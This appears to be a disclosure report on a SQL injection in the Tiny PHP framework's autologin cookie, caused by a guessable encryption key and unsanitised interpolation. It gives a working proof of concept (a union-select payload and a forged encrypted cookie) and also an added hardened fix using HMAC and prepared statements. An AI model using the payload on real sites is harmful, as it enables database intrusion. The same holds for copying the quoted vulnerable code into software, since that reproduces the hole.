### Brief description:
The cookie value is not filtered, leading to SQL injection
### Details:
First, look at how the cookie is encrypted:
```
/// Encryption/decryption routine
private static function code($string, $op="decode", $key='', $expiry=0)
/// Call site for encryption:
$value = Crypt::encode($value,self::getSafeCode());
/// Call site for decryption:
$cookie= Crypt::decode($cryptCookie,self::getSafeCode());
```
The key piece here is self::getSafeCode():
```
public static function getSafeCode()
{
    if(self::$safeCode == '') self::setSafeCode();
    return self::$safeCode;
}
public static function setSafeCode($scode='')
{
    // The key is the configured safe code followed by a client-derived value
    self::$safeCode = $scode.self::cookieId();
}
private static function cookieId()
{
    // Level 0 (the default): constant 1
    if(self::$safeLave==0) return 1;
    // Level 1: md5 of the client IP
    if(self::$safeLave==1) return md5(Chips::getIP());
    // Level 2: md5 of the client IP plus User-Agent
    if(self::$safeLave==2) return md5(Chips::getIP().$_SERVER["HTTP_USER_AGENT"]);
}
```
This means the cookie encryption key can only take one of three forms, and all three are values the user can obtain. Moreover, the default is the first form, i.e. key=1.
Now look at the method in classes/common.php:
```
// User info for automatic login
static function autoLoginUserInfo()
{
    $cookie = new Cookie();
    $cookie->setSafeCode(Tiny::app()->getSafeCode());
    // Decrypted and unserialized cookie; both fields come from the client
    $autologin = $cookie->get('autologin');
    $obj = null;
    if($autologin!=null){
        $email = $autologin['email'];
        $password = $autologin['password'];
        $model = new Model("user as us");
        // $email is interpolated straight into the WHERE clause
        $obj = $model->join("left join customer as cu on us.id = cu.user_id")->fields("us.*,cu.group_id,cu.login_time")->where("us.email='$email'")->find();
        if($obj['password'] != $password){
            $obj = null;
        }
    }
    return $obj;
}
```
This is where the autologin cookie value is read; now look at how it is fetched:
```
public static function get($name)
{
    if(self::checkSafe()==1)
    {
        if(isset($_COOKIE[self::$per.$name]))
        {
            $cryptCookie = $_COOKIE[self::$per.$name];
            // Decrypt with the safe code derived above
            $cookie= Crypt::decode($cryptCookie,self::getSafeCode());
            $tem = substr($cookie,0,10);
            // If the plaintext looks like a serialized array/object, unserialize it; no other validation
            if(preg_match('/^[Oa]:\d+:.*/',$tem)) $cookie = unserialize($cookie);
            return $cookie;
        }
        return null;
    }
    if(self::checkSafe()==0) self::clear($name);// Tiny::msg('Illegal cookie theft, the system will stop working!',0);
    else return null;
}
```
Here we see that after decryption the cookie is merely unserialized, so its contents are passed directly into the backend SQL statement.
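As an added example (this is not code from the Tiny framework or from the report above), here is a hardened replacement for autoLoginUserInfo() that addresses both weaknesses just described: the cookie is authenticated with an HMAC under a server-side secret that is not derivable from the client's IP or User-Agent, and the e-mail is bound as a prepared-statement parameter instead of being interpolated into the WHERE clause. The class name AutoLogin, the AUTOLOGIN_SECRET environment variable, the PDO handle and the cookie layout are assumptions; the table and column names are taken from the query quoted above.

```php
<?php
// Added example, not project code. Assumed: a PDO connection to the same
// user/customer tables, and a random secret in the AUTOLOGIN_SECRET env var.
final class AutoLogin
{
    private const SECRET_ENV = 'AUTOLOGIN_SECRET';   // assumed config name
    private const COOKIE     = 'Tiny_autologin';     // cookie name from the report
    private const MAX_AGE    = 14 * 86400;           // assumed lifetime: 14 days

    // The secret lives only on the server, unlike safecode=1 / md5(IP) / md5(IP.UA).
    private static function secret(): string
    {
        $s = getenv(self::SECRET_ENV);
        if ($s === false || strlen($s) < 32) {
            throw new RuntimeException('autologin secret not configured');
        }
        return $s;
    }

    // Cookie value: base64(email|expiry) "." hmac-sha256 tag.
    // The client can read the fields but cannot change them without breaking the tag,
    // and no password hash or serialized PHP data is stored in the cookie.
    public static function issue(string $email): string
    {
        $payload = base64_encode($email . '|' . (time() + self::MAX_AGE));
        $tag = hash_hmac('sha256', $payload, self::secret());
        return $payload . '.' . $tag;
    }

    // Verify the tag in constant time first, then decode; returns null on any failure.
    public static function parse(string $cookie): ?array
    {
        $parts = explode('.', $cookie, 2);
        if (count($parts) !== 2) {
            return null;
        }
        [$payload, $tag] = $parts;
        $expected = hash_hmac('sha256', $payload, self::secret());
        if (!hash_equals($expected, $tag)) {
            return null;                               // forged or tampered
        }
        $decoded = base64_decode($payload, true);
        if ($decoded === false) {
            return null;
        }
        $fields = explode('|', $decoded, 2);
        if (count($fields) !== 2 || !ctype_digit($fields[1]) || (int)$fields[1] < time()) {
            return null;                               // malformed or expired
        }
        return ['email' => $fields[0], 'expiry' => (int)$fields[1]];
    }

    // Replacement for autoLoginUserInfo(): the e-mail is a bound parameter, so a value
    // such as "' union select ..." is compared as a literal string and matches no row.
    public static function userInfo(PDO $db): ?array
    {
        if (!isset($_COOKIE[self::COOKIE])) {
            return null;
        }
        $claims = self::parse($_COOKIE[self::COOKIE]);
        if ($claims === null) {
            setcookie(self::COOKIE, '', time() - 3600, '/');   // drop the bad cookie
            return null;
        }
        $stmt = $db->prepare(
            'SELECT us.*, cu.group_id, cu.login_time
               FROM user AS us
               LEFT JOIN customer AS cu ON us.id = cu.user_id
              WHERE us.email = :email'
        );
        $stmt->execute([':email' => $claims['email']]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    }
}
```

Because the cookie no longer carries the password hash, the original `$obj['password'] != $password` comparison is not needed; the HMAC tag is what proves the server issued the cookie. Invalidating outstanding cookies on a password change is left to the caller, for example by binding a per-user token version into the payload.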
Using the default $key=1 as the PoC example:
The injected SQL fragment is: ' union select 1,user(),1,1,1,1,1,1,1#
After serialization and encryption the ciphertext is: bfc8bbdb4aOTkwMDQwMDMxMzkxNGY/MDRkZDBhZjIzPGE4MWA0NzVhOjE9e3EyNTgibW1gbGwiOXI8MzE6KyMgdW5pbm4gc2VtZWN9IjgpdXpley0hLDEuNyoxJTcuMikxKjEjKzt3Ojg6J3lkcHV/bHNkIjtzODE6IjAmOH0
Set the cookies:
```
safecode=1
Tiny_autologin=bfc8bbdb4aOTkwMDQwMDMxMzkxNGY/MDRkZDBhZjIzPGE4MWA0NzVhOjE9e3EyNTgibW1gbGwiOXI8MzE6KyMgdW5pbm4gc2VtZWN9IjgpdXpley0hLDEuNyoxJTcuMikxKjEjKzt3Ojg6J3lkcHV/bHNkIjtzODE6IjAmOH0
```
Then open the homepage and the username is displayed.
![BaiduHi_2014-9-4_21-28-16.png](https://images.seebug.org/upload/201409/04212918ef2a12cf5feef1fdf1cf1016551bdf53.png)
![BaiduHi_2014-9-4_21-28-24.png](https://images.seebug.org/upload/201409/04212935c98dd1062a12db4ce1dfca32fb29ed60.png)
![BaiduHi_2014-9-4_21-28-47.png](https://images.seebug.org/upload/201409/04212944158a36a64f603b04ebb0cf1effe30834.png)
### Proof of vulnerability:
The three screenshots above serve as the proof.